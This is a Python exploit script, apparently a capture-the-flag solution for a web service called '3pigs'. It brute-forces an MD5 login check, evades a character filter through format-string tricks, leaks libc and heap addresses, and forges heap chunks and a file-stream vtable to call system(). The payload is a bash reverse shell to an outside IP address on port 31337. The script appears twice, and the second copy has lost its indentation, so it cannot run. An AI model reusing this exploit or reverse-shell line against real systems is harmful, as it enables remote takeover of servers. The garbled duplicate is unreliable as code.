peternguyen93/3pigs.py

## 3pigs.py
#!/usr/bin/python
# Author : peternguyen

from struct import *
from base64 import b64encode,b64decode
import requests
import re
import hashlib
import random

# host = 'http://localhost:8888'
host = 'http://localhost:8887'
host = 'http://47.75.153.218:9999'

session = requests.Session()


# target = 'UOTp%I()<>S'
# out = ''
# for c in target:
# 	found = False
# 	for func_name in dir("")[::-1]:
# 		try:
# 			doc = getattr(getattr("",func_name),"__doc__")
# 			if c in doc:
# 				idx = doc.find(c)
# 				out += "{0.%s.__doc__[%d]}" % (func_name,idx)
# 				print c,"{0.%s.__doc__[%d]}" % (func_name,idx)
# 				found = True
# 				break
# 		except TypeError:
# 			pass
# 	if not found:
# 		print 'char %s not found' % c

# print out,len(out) < 0xc0


def p64(value):
	return pack('<Q',value)

def up64(value):
	value = value.ljust(8,'\x00')
	return unpack('<Q',value)[0]

def pA(*argv):
	out = ''
	for it in argv:
		out += p64(it)
	return out

magic = '{0.encode.__doc__[254]}{0.rfind.__doc__[146]}{0.zfill.__doc__[114]}{0.zfill.__doc__[97]}{0.__rmod__.__doc__[20]}{0.translate.__doc__[286]}{0.__str__.__doc__[12]}{0.zfill.__doc__[0]}'

def bypass(c):
	my_dict = {
		'U' : '{0.encode.__doc__[254]}',
		'O' : '{0.rfind.__doc__[146]}',
		'T' : '{0.zfill.__doc__[114]}',
		'p' : '{0.zfill.__doc__[97]}',
		'%' : '{0.__rmod__.__doc__[20]}',
		'I' : '{0.translate.__doc__[286]}',
		'(' : '{0.zfill.__doc__[7]}',
		')' : '{0.zfill.__doc__[13]}',
		'<' : '{0.__str__.__doc__[12]}',
		'>' : '{0.zfill.__doc__[16]}',
		'S' : '{0.zfill.__doc__[0]}'
	}

	if my_dict.has_key(c):
		return my_dict[c]
	return ''


def login():
	req = session.get(host + '/login.php')
	out = re.findall(r'md5\(\?\)\[:4\] = ([0-9a-f]{4})',req.text)
	target_hash = out[0].encode('utf8')
	print '[!] Target Hash'

	rand_str = ''
	while 1:
		rand_str = str(random.random()*100000000000000)
		rand_hash = hashlib.md5(rand_str).hexdigest()
		if rand_hash[:4] == target_hash:
			print '[!!] Found',rand_str
			break

	req = session.post(host + '/login.php',data={'username':'clgt111','vcode':rand_str})
	return True

def create_pig(idx,data):
	req = session.post(host + '/addpig.php',data={'id':idx,'content':b64encode(data)})
	return req.text

def free_pig(idx):
	req = session.post(host + '/freepig.php',data={'id':idx})
	return req.text

def secret():
	req = session.post(host + '/flypig.php',data={'secret':b64encode(magic)})
	return req.text

def list_pigs():
	req = session.get(host + '/manage.php')
	return req.text

def overflow(value):
	limit = 'UOTp%I()<>S'
	v_array = list(value)

	for i,c in enumerate(v_array):
		t = bypass(c)
		if t:
			v_array[i] = t
	# print v_array
	value = b64encode(''.join(v_array))
	# print value

	req = session.post(host + '/flypig.php',data={'secret':value})
	return req.text

def exploit(**kargs):
	# global p # use global var
	# if kargs.has_key('p'):
	# 	if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
	# 		p = kargs['p']
	# p.connect()

	# raw_input('Debug>')

	if not login():
		print 'Thot'
		return

	create_pig(2,'A'*0xb0)
	create_pig(1,'B'*0xb0)

	free_pig(2)
	create_pig(2,'C'*0xb0)
	out = list_pigs()
	out = out.encode('utf8').decode('string-escape')
	# print repr(out)
	idx = out.find('Small Li') + len('Small Li')
	libc = up64(out[idx:idx + 6]) - 0x3c1b58
	print 'Libc:',hex(libc)

	_IO_list_all = libc + 0x3c2500
	_IO_wstr_finish = libc + 0x3bdc90
	system = libc + 0x456a0

	free_pig(2)
	free_pig(1)

	create_pig(0,'A'*0xb0)
	secret()
	create_pig(2,'A'*0xb0)
	create_pig(1,'A'*0xb0)

	free_pig(2)
	free_pig(0)
	create_pig(2,'A'*0xb0)

	out = list_pigs()
	out = out.encode('utf8').decode('string-escape')
	idx = out.find('Small Li') + len('Small Li')
	heap = up64(out[idx:idx + 6]) - 0x19e30
	# print repr(out)
	print '[!] Heap:',hex(heap)

	fake_chunk = pA(0,0xd1)
	fake_chunk+= pA(heap + 0x19f80,heap + 0x1a010)
	fake_chunk+= 'P'*16
	fake_chunk+= pA(0,0x61)
	fake_chunk+= pA(heap + 0x19fe0,libc + 0x3c1b58)
	free_pig(2)
	create_pig(2,'A'*0xb0)
	create_pig(0,'A'*0x40 + fake_chunk)
	free_pig(0)
	free_pig(2)

	overflow(pA(libc + 0x3c1b58,heap + 0x19fe0))

	create_pig(0,'Z'*40)
	create_pig(2,'U'*0x10)
	free_pig(1)
	# write IO_wstr_vtable_address
	write_fake_vtable = 'M'*0x28 + p64(_IO_wstr_finish - 0x18)
	write_fake_vtable+= 'Z'*8 + p64(system)
	create_pig(1,'T'*0x48 + p64(0x51) + write_fake_vtable)

	free_pig(0)
	free_pig(2)

	create_pig(0,'A'*0x40+ pA(0,0xd1,0x4141414141, _IO_list_all - 0x10))

	# fake_vtable =
	fake_IO_wstr_vtable = ''

	fake_io = pA(0,1)
	fake_io+= 'A'*8
	fake_io+= p64(heap + 0x1a020) # command address
	fake_io+= 'bash -c \'bash -i >& /dev/tcp/139.59.244.42/31337 0>&1\'\x00'
	# fake_io+= fake_vtable
	fake_io = fake_io.ljust(176,'A')
	fake_io+= p64(heap + 0x1a000 - 0x18)
	fake_io = fake_io.ljust(0xb8,'K') # => control vtable here get shell
	create_pig(2,fake_io)

	# raw_input('>')
	free_pig(1)
	req = session.post(host + '/freepig.php',data={'id':'1'})
	print req.text

	# print repr(out)
	# list_pigs()

exploit()
	#!/usr/bin/python
	# Author : peternguyen

	from struct import *
	from base64 import b64encode,b64decode
	import requests
	import re
	import hashlib
	import random

	# host = 'http://localhost:8888'
	host = 'http://localhost:8887'
	host = 'http://47.75.153.218:9999'

	session = requests.Session()


	# target = 'UOTp%I()<>S'
	# out = ''
	# for c in target:
	# found = False
	# for func_name in dir("")[::-1]:
	# try:
	# doc = getattr(getattr("",func_name),"__doc__")
	# if c in doc:
	# idx = doc.find(c)
	# out += "{0.%s.__doc__[%d]}" % (func_name,idx)
	# print c,"{0.%s.__doc__[%d]}" % (func_name,idx)
	# found = True
	# break
	# except TypeError:
	# pass
	# if not found:
	# print 'char %s not found' % c

	# print out,len(out) < 0xc0


	def p64(value):
	return pack('<Q',value)

	def up64(value):
	value = value.ljust(8,'\x00')
	return unpack('<Q',value)[0]

	def pA(*argv):
	out = ''
	for it in argv:
	out += p64(it)
	return out

	magic = '{0.encode.__doc__[254]}{0.rfind.__doc__[146]}{0.zfill.__doc__[114]}{0.zfill.__doc__[97]}{0.__rmod__.__doc__[20]}{0.translate.__doc__[286]}{0.__str__.__doc__[12]}{0.zfill.__doc__[0]}'

	def bypass(c):
	my_dict = {
	'U' : '{0.encode.__doc__[254]}',
	'O' : '{0.rfind.__doc__[146]}',
	'T' : '{0.zfill.__doc__[114]}',
	'p' : '{0.zfill.__doc__[97]}',
	'%' : '{0.__rmod__.__doc__[20]}',
	'I' : '{0.translate.__doc__[286]}',
	'(' : '{0.zfill.__doc__[7]}',
	')' : '{0.zfill.__doc__[13]}',
	'<' : '{0.__str__.__doc__[12]}',
	'>' : '{0.zfill.__doc__[16]}',
	'S' : '{0.zfill.__doc__[0]}'
	}

	if my_dict.has_key(c):
	return my_dict[c]
	return ''


	def login():
	req = session.get(host + '/login.php')
	out = re.findall(r'md5\(\?\)\[:4\] = ([0-9a-f]{4})',req.text)
	target_hash = out[0].encode('utf8')
	print '[!] Target Hash'

	rand_str = ''
	while 1:
	rand_str = str(random.random()*100000000000000)
	rand_hash = hashlib.md5(rand_str).hexdigest()
	if rand_hash[:4] == target_hash:
	print '[!!] Found',rand_str
	break

	req = session.post(host + '/login.php',data={'username':'clgt111','vcode':rand_str})
	return True

	def create_pig(idx,data):
	req = session.post(host + '/addpig.php',data={'id':idx,'content':b64encode(data)})
	return req.text

	def free_pig(idx):
	req = session.post(host + '/freepig.php',data={'id':idx})
	return req.text

	def secret():
	req = session.post(host + '/flypig.php',data={'secret':b64encode(magic)})
	return req.text

	def list_pigs():
	req = session.get(host + '/manage.php')
	return req.text

	def overflow(value):
	limit = 'UOTp%I()<>S'
	v_array = list(value)

	for i,c in enumerate(v_array):
	t = bypass(c)
	if t:
	v_array[i] = t
	# print v_array
	value = b64encode(''.join(v_array))
	# print value

	req = session.post(host + '/flypig.php',data={'secret':value})
	return req.text

	def exploit(**kargs):
	# global p # use global var
	# if kargs.has_key('p'):
	# if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
	# p = kargs['p']
	# p.connect()

	# raw_input('Debug>')

	if not login():
	print 'Thot'
	return

	create_pig(2,'A'*0xb0)
	create_pig(1,'B'*0xb0)

	free_pig(2)
	create_pig(2,'C'*0xb0)
	out = list_pigs()
	out = out.encode('utf8').decode('string-escape')
	# print repr(out)
	idx = out.find('Small Li') + len('Small Li')
	libc = up64(out[idx:idx + 6]) - 0x3c1b58
	print 'Libc:',hex(libc)

	_IO_list_all = libc + 0x3c2500
	_IO_wstr_finish = libc + 0x3bdc90
	system = libc + 0x456a0

	free_pig(2)
	free_pig(1)

	create_pig(0,'A'*0xb0)
	secret()
	create_pig(2,'A'*0xb0)
	create_pig(1,'A'*0xb0)

	free_pig(2)
	free_pig(0)
	create_pig(2,'A'*0xb0)

	out = list_pigs()
	out = out.encode('utf8').decode('string-escape')
	idx = out.find('Small Li') + len('Small Li')
	heap = up64(out[idx:idx + 6]) - 0x19e30
	# print repr(out)
	print '[!] Heap:',hex(heap)

	fake_chunk = pA(0,0xd1)
	fake_chunk+= pA(heap + 0x19f80,heap + 0x1a010)
	fake_chunk+= 'P'*16
	fake_chunk+= pA(0,0x61)
	fake_chunk+= pA(heap + 0x19fe0,libc + 0x3c1b58)
	free_pig(2)
	create_pig(2,'A'*0xb0)
	create_pig(0,'A'*0x40 + fake_chunk)
	free_pig(0)
	free_pig(2)

	overflow(pA(libc + 0x3c1b58,heap + 0x19fe0))

	create_pig(0,'Z'*40)
	create_pig(2,'U'*0x10)
	free_pig(1)
	# write IO_wstr_vtable_address
	write_fake_vtable = 'M'*0x28 + p64(_IO_wstr_finish - 0x18)
	write_fake_vtable+= 'Z'*8 + p64(system)
	create_pig(1,'T'*0x48 + p64(0x51) + write_fake_vtable)

	free_pig(0)
	free_pig(2)

	create_pig(0,'A'*0x40+ pA(0,0xd1,0x4141414141, _IO_list_all - 0x10))

	# fake_vtable =
	fake_IO_wstr_vtable = ''

	fake_io = pA(0,1)
	fake_io+= 'A'*8
	fake_io+= p64(heap + 0x1a020) # command address
	fake_io+= 'bash -c \'bash -i >& /dev/tcp/139.59.244.42/31337 0>&1\'\x00'
	# fake_io+= fake_vtable
	fake_io = fake_io.ljust(176,'A')
	fake_io+= p64(heap + 0x1a000 - 0x18)
	fake_io = fake_io.ljust(0xb8,'K') # => control vtable here get shell
	create_pig(2,fake_io)

	# raw_input('>')
	free_pig(1)
	req = session.post(host + '/freepig.php',data={'id':'1'})
	print req.text

	# print repr(out)
	# list_pigs()

	exploit()